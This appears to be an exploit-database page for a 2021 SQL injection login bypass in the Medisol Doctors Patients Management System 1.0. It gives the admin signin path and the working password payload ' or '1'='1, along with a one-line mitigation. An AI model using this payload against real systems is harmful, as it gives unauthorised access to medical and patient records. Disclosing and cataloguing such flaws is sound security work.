header-logo
Suggest Exploit
vendor:
Medisol Doctors Patients Managment System
by:
Murat DEMIRCI (butterflyhunt3r)
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Medisol Doctors Patients Managment System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:codester:medisol_doctors_patients_managment_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10
2021

Doctors Patients Management System 1.0 – SQL Injection (Authentication Bypass)

The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication by entering anything as the username and ' or '1'='1' as the password.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
# Date: 06/30/2021
# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
# Version: 1.0
# Tested on: Windows 10
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.

# Proof of Concept :
http://test.com/PATH/signin

# Username : anything
# Password : ' or '1'='1